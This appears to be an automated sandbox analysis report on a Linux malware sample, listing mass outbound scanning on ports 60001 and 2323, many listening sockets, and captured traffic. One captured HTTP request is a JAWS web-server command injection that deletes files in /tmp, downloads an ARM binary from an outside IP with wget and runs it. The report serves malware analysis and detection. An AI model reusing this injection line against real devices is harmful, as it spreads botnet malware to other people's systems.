        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 173.124.36.7:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 201.248.167.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 131.11.27.230:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.245.182.12:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 43.239.0.245:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 216.5.123.211:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 139.47.105.252:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.97.106.106:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 220.94.102.135:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 184.192.57.43:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.26.78.126:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 153.17.190.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 86.189.78.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 148.128.147.110:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.208.183.15:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 121.85.105.239:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 50.3.81.115:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 195.67.19.122:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.254.183.17:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 24.144.22.53:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.181.99.110:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 71.185.42.28:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.41.155.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 41.75.109.117:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 133.188.133.195:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.129.231.122:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 216.98.48.225:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 88.153.80.73:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 205.144.54.102:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.158.229.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.209.13.180:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 126.161.7.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 176.104.244.75:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 198.123.38.212:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.249.157.202:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 54.158.115.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.16.46.184:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 132.159.36.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 17.205.117.14:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 122.135.180.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 194.110.116.124:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 162.171.25.230:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 48.110.242.5:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 209.116.57.45:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 164.194.53.156:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.50.187.137:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.40.195.149:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.6.162.150:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 142.251.3.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.190.111.22:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 62.134.23.191:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 152.12.96.249:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 91.228.130.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 111.182.31.84:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.141.237.185:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.163.138.238:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 92.26.47.6:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.50.237.10:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.36.60.1:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 210.41.65.97:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 160.254.70.191:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 77.145.165.59:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 80.162.142.63:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 196.90.55.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 34.240.234.120:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.135.252.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 115.54.176.189:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 135.209.90.189:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 125.110.178.11:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.202.175.226:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 59.251.141.207:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 64.122.159.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 70.0.62.16:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.120.242.119:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 41.5.211.108:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 45.164.218.237:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 86.127.145.27:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 107.149.28.145:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.70.157.161:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 150.193.154.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 104.74.138.220:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 36.17.177.2:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.82.111.220:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 163.112.196.99:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 158.74.13.171:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 134.143.156.228:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 186.34.192.143:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 210.49.92.137:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 212.95.83.190:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 62.164.59.70:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 59.255.98.188:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 142.199.230.119:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 207.58.149.186:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 144.248.174.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 173.204.177.145:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 106.201.100.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 74.50.95.55:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.31.236.42:60001
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 71.172.59.44:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 120.25.65.201:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 65.153.31.7:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 64.31.7.63:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 151.100.107.14:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 84.203.94.223:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 177.14.219.58:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 151.250.232.41:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 9.54.171.230:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 146.105.183.4:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 152.45.172.165:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 90.181.198.44:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 34.102.171.101:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 4.198.87.247:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 53.45.72.71:2323
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 160.52.234.72:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.225.86.245:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 203.233.73.95:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.62.1.217:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 157.173.223.116:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 149.231.145.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.187.76.8:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 74.155.147.251:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.232.111.17:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 174.207.32.38:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 131.60.77.186:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 48.133.5.124:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.71.158.249:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 219.150.249.221:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 138.77.187.249:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 209.142.176.24:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.241.222.169:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.233.235.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.141.159.188:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 151.86.54.221:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 64.230.96.254:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.139.27.42:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.196.74.43:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.103.235.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.115.162.4:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 31.145.196.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 145.152.32.158:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.9.181.237:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.109.67.70:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 182.234.179.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 130.64.134.73:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 118.160.50.194:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.211.243.133:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 149.146.85.161:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.70.68.220:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.226.98.113:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.172.112.202:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.212.147.190:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 78.5.2.128:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 5.91.15.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 72.77.199.171:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 20.130.34.193:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 205.244.180.7:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.94.247.27:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 132.9.174.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.246.110.130:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 187.98.204.182:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 77.111.208.14:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.144.2.27:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 4.242.176.29:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 8.69.43.202:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 183.214.135.130:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 174.179.3.247:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.119.3.142:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 210.111.87.178:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 78.166.140.198:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 91.12.107.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 152.138.41.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 45.40.139.188:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 148.31.32.49:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 161.187.67.134:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 119.144.161.109:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 123.228.155.233:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 136.50.36.101:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 112.37.143.83:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 25.143.207.83:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 167.159.30.247:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.145.182.193:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.114.24.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 84.148.105.160:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.82.119.95:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 189.106.135.217:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 8.142.95.118:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 207.240.47.4:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 113.138.6.36:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.236.134.169:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 27.96.35.155:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.92.43.151:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 146.160.111.161:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 138.162.227.226:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 75.250.137.163:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 137.1.230.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 46.209.109.111:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.101.121.174:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.241.219.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 98.94.54.211:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 62.163.229.190:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 102.186.96.37:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 5.72.58.39:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.216.188.143:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 196.50.200.118:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 160.205.150.207:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 39.103.223.163:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 23.93.242.117:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 134.198.217.196:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 84.19.131.22:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.3.22.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 57.130.245.37:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.165.131.236:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 123.193.94.149:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.174.189.3:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 143.202.63.126:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.89.124.54:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 171.224.44.120:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 216.219.151.168:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 190.174.207.126:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 66.246.204.206:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 41.87.47.240:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 74.0.249.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 156.143.210.28:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.128.115.208:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 171.154.193.197:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 193.203.160.171:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 120.13.77.138:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.213.180.123:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.17.122.21:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 63.19.75.189:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.243.221.244:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 109.7.213.45:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 89.5.210.58:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 108.2.232.38:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.40.253.31:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.35.104.253:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.218.29.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 91.183.174.158:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 45.37.128.201:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 133.240.139.98:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.164.249.204:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 181.216.12.212:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 108.54.18.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 136.65.0.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 60.223.100.61:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 182.194.102.166:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.177.26.8:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 223.246.88.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.79.13.9:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 104.2.194.163:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 129.61.6.241:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 13.89.106.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 14.73.203.214:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 102.153.202.206:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.13.20.46:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 200.7.27.150:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 157.67.216.33:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 19.92.118.103:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 150.162.112.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 117.211.168.174:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 51.160.232.169:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 164.73.195.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 167.242.44.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 152.132.83.177:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 18.146.56.66:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 18.184.200.126:60001
        Source: /tmp/01oHMcUgUM (PID: 5263) Socket: 127.0.0.1::43829
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::23
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::0
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::80
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::60001
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8000
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::9000
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8080
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8081
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::53413
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::52869
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::37215
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::81
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8089
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8088
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8083
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::443
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::4444
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8001
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::49152
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::40960
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::1024
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::1337
        Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::420
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::0
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::80
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::60001
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8000
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::9000
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8080
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8081
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::53413
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::52869
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::37215
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::81
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8089
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8088
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8083
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::443
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::4444
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8001
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::49152
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::40960
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::1024
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::1337
        Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::420
        Source: /lib/systemd/systemd-journald (PID: 5305) Socket: <unknown socket type>:unknown
        Source: /usr/sbin/gdm3 (PID: 5500) Socket: <unknown socket type>:unknown
        Source: /usr/bin/dbus-daemon (PID: 5531) Socket: <unknown socket type>:unknown
        Source: /lib/systemd/systemd-journald (PID: 5568)Socket: <unknown socket type>:unknownJump to behavior
        Source: /lib/systemd/systemd-journald (PID: 5672)Socket: <unknown socket type>:unknownJump to behavior
        Source: /lib/systemd/systemd-journald (PID: 5768)Socket: <unknown socket type>:unknown
        Source: /usr/sbin/gdm3 (PID: 5770)Socket: <unknown socket type>:unknown
        Source: /lib/systemd/systemd-journald (PID: 5889)Socket: <unknown socket type>:unknown
        Source: /lib/systemd/systemd-journald (PID: 5992)Socket: <unknown socket type>:unknown
        Source: /usr/sbin/gdm3 (PID: 5993)Socket: <unknown socket type>:unknown
        Source: unknown Network traffic detected: HTTP traffic on port 35426 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35426
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36630
        Source: unknown Network traffic detected: HTTP traffic on port 36626 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36624
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36626
        Source: unknown Network traffic detected: HTTP traffic on port 36630 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 36624 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 36628 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36628
        Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknown TCP traffic detected without corresponding DNS query: 4.81.245.225
        Source: global traffic HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: JAWS/1.0 Aug 12 2019
            Content-Type: text/html; charset=UTF-8
            Content-length: 213
        Source: syslog.286.dr, syslog.67.dr, syslog.190.dr, syslog.234.dr, syslog.344.dr String found in binary or memory: https://www.rsyslog.com
        Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com
        Source: global traffic HTTP traffic detected:
            GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1
            User-Agent: Hello, world
            Host: 127.0.0.1:80
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
            Connection: keep-alive
        Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35426 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36624 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36626 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36628 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36630 version: TLS 1.2

        System Summary:
